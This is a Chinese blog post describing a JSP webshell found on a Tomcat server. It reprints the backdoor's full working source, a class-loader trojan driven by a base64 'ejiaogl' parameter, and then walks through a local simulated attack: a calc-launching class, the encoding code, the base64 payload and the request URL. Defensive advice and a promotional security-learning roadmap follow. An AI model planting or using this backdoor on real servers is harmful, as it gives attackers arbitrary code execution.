一次被木马攻击的记录

描述

最近一个老同学跟我说他部署在阿里云上的系统，在tomcat的目录下出现了一个index.jsp文件，内容大致如下：

我一看发现这不就是一个木马后门文件吗，只需要通过参数ejiaogl传入一个经过base64编码的Class文件，这样就可以解码然后被类加载器加载，而我们知道类被加载的时候是可以执行static代码块的，而这个代码块可以任由攻击者来指定要执行的代码，是非常危险的，为了更加形象我特意做了一个模拟攻击。

模拟攻击

准备木马文件

准备一个Tomcat，直接启动即可，默认访问的是ROOT目录下的index.jsp，准备好以上的木马后门文件直接替换，文件如下：

<%!
//自定义了一个类加载器
class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte[] b) {return this.defineClass(b, 0, b.length);}
}
•
public byte[] base64Decoder(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {
        //这里还做了一个base64的兼容处理Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}
}
%>
<%
//接收base64编码的字符
String cls = request.getParameter("ejiaogl");
if(cls != null){U u = new U(this.getClass().getClassLoader());byte[] b = base64Decoder(cls);Class clazz = u.g(b);
    // 这里需要注意一下，ClassLoader方式并不会执行静态代码块，Class.forName可以执行静态代码块的clazz.newInstance();
}
%>
<html>
<body>
<h2>Hello World!</h2>
</body>
</html> 

准备命令类

这里准备一个简单的命令类，打印日志，同时调用本地的计算器：

import java.io.IOException;
public class Script {
•static {
        //非法操作System.out.println("==Illegal operation==");try {
            //打开计算器Runtime.getRuntime().exec("calc");} catch (IOException e) {}}
} 

Base64字符串

需要读取Class文件，然后转换成一个Base64编码的字符串：

private static byte[] loadBytes(Class<?> cls) throws IOException {String name = cls.getCanonicalName().replaceAll("\.", "/") + ".class";InputStream is = ClassLoader.getSystemResourceAsStream(name);BufferedInputStream bis = new BufferedInputStream(is);try {int length = is.available();byte[] bs = new byte[length];bis.read(bs);return bs;} finally {bis.close();is.close();}
}
•
// 编码操作
byte[] b = loadBytes(Script.class); 
String base64str = Base64.getEncoder().encodeToString(b); 

以上生成的base64字符串如下所示：

yv66vgAAADQALgcAAgEABlNjcmlwdAcABAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAAygpVgEABENvZGUJAAkACwcACgEAEGphdmEvbGFuZy9TeXN0ZW0MAAwADQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwgADwEAFT09SWxsZWdhbCBvcGVyYXRpb249PQoAEQATBwASAQATamF2YS9pby9QcmludFN0cmVhbQwAFAAVAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAFwAZBwAYAQARamF2YS9sYW5nL1J1bnRpbWUMABoAGwEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsIAB0BAARjYWxjCgAXAB8MACAAIQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsHACMBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQANU3RhY2tNYXBUYWJsZQEABjxpbml0PgoAAwApDAAnAAYBAAR0aGlzAQAITFNjcmlwdDsBAApTb3VyY2VGaWxlAQALU2NyaXB0LmphdmEAIQABAAMAAAAAAAIACAAFAAYAAQAHAAAAVwACAAEAAAAWsgAIEg62ABC4ABYSHLYAHlenAARLsQABAAgAEQAUACIAAwAkAAAAEgAEAAAABgAIAAgAEQAJABUACwAlAAAAAgAAACYAAAAHAAJUBwAiAAABACcABgABAAcAAAAvAAEAAQAAAAUqtwAosQAAAAIAJAAAAAYAAQAAAAMAJQAAAAwAAQAAAAUAKgArAAAAAQAsAAAAAgAt 

发送请求

在浏览器中访问如下地址：

http://localhost:8080/index.jsp?ejiaogl=以上base64字符串 

可以发现会生成相应的日志，同时会调用服务器端上的计算器，简单模拟了一次攻击；

Webshell

告警

当然阿里云是给出告警的，告警内容如下所示：

其中提到了index.jsp是一个木马文件，同时指定了木马类型为Webshell；

简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境，主要用于网站管理、服务器管理、权限管理等操作。使用方法简单，只需上传一个代码文件，通过网址访问，便可进行很多日常操作，极大地方便了使用者对网站和服务器的管理。正因如此，也有小部分人将代码修改后当作后门程序使用，以达到控制网站服务器的目的。

一方面，webshell被站长常常用于网站管理、服务器管理等等，根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等； 另一方面，被入侵者利用，从而达到控制网站服务器的目的。这些网页脚本常称为WEB脚本木马，比较流行的asp或php木马，也有基于.NET的脚本木马与JSP脚本木马。国内常用的WebShell有海阳ASP木马，Phpspy，c99shell等。

安全防范

1.建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。 2.对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。 3.asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。 4.到正规网站下载程序，下载后要对数据库名称和存放路径进行修改，数据库名称要有一定复杂性。 5.要尽量保持程序是最新版本。 6.不要在网页上加注后台管理程序登陆页面的链接。 7.为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过上传即可。 8.要时常备份数据库等重要文件。 9.日常要多维护，并注意空间中是否有来历不明的asp文件。 10.尽量关闭网站搜索功能，利用外部搜索工具，以防爆出数据。 11.利用白名单上传文件，不在白名单内的一律禁止上传，上传目录权限遵循最小权限原则。

参考

baike.baidu.com/item/webshe…

www.freebuf.com/articles/we…

总结

对于一个网站来说安全性其实是最重要的，但是对很多程序员来说往往会忽视这个问题，因为很多公司都有专门的安全部门，很多安全问题其实并不会流转到程序员手中；但我觉得我们程序员群体还是很有必要去了解一些安全方面的知识，一方面是保证了我们系统的安全性，另一方面其实也让我们对一些知识点理解的更加透彻，往往给你一种“还可以这么玩”的感觉。

网络安全入门学习路线

其实入门网络安全要学的东西不算多，也就是网络基础+操作系统+中间件+数据库，四个流程下来就差不多了。

1.网络安全法和了解电脑基础

其中包括操作系统Windows基础和Linux基础，标记语言HTML基础和代码JS基础，以及网络基础、数据库基础和虚拟机使用等...

别被这些看上去很多的东西给吓到了，其实都是很简单的基础知识，同学们看完基本上都能掌握。计算机专业的同学都应该接触了解过，这部分可以直接略过。没学过的同学也不要慌，可以去B站搜索相关视频，你搜关键词网络安全工程师会出现很多相关的视频教程，我粗略的看了一下，排名第一的视频就讲的很详细。 当然你也可以看下面这个视频教程仅展示部分截图： 学到http和https抓包后能读懂它在说什么就行。

2.网络基础和编程语言

3.入手Web安全

web是对外开放的，自然成了的重点关照对象，有事没事就来入侵一波，你说不管能行吗！ 想学好Web安全，咱首先得先弄清web是怎么搭建的，知道它的构造才能精准打击。所以web前端和web后端的知识多少要了解点，然后再学点python，起码得看懂部分代码吧。

最后网站开发知识多少也要了解点，不过别紧张，只是学习基础知识。

等你用几周的时间学完这些，基本上算是具备了入门合格渗透工程师的资格，记得上述的重点要重点关注哦！ 再就是，要正式进入web安全领域，得学会web渗透，OWASP TOP 10等常见Web漏洞原理与利用方式需要掌握，像SQL注入/XSS跨站脚本攻击/Webshell木马编写/命令执行等。

这个过程并不枯燥，一边打怪刷级一边成长岂不美哉，每个攻击手段都能让你玩得不亦乐乎，而且总有更猥琐的方法等着你去实践。

学完web渗透还不算完，还得掌握相关系统层面漏洞，像ms17-010永恒之蓝等各种微软ms漏洞，所以要学习后渗透。可能到这里大家已经不知所云了，不过不要紧，等你学会了web渗透再来看会发现很简单。

其实学会了这几步，你就正式从新手小白晋升为入门学员了，真的不算难，你上你也行。

4.安全体系

不过我们这个水平也就算个渗透测试工程师，也就只能做个基础的安全服务，而这个领域还有很多业务，像攻防演练、等保测评、风险评估等，我们的能力根本不够看。

所以想要成为一名合格的网络工程师，想要拿到安全公司的offer，还得再掌握更多的网络安全知识，能力再更上一层楼才行。即便以后进入企业，也需要学习很多新知识，不充实自己的技能就会被淘汰。

从时代发展的角度看，网络安全的知识是学不完的，而且以后要学的会更多，同学们要摆正心态，既然选择入门网络安全，就不能仅仅只是入门程度而已，能力越强机会才越多。

尾言

因为入门学习阶段知识点比较杂，所以我讲得比较笼统，最后联合CSDN整理了一套【282G】网络安全从入门到精通资料包，需要的小伙伴可以点击链接领取哦！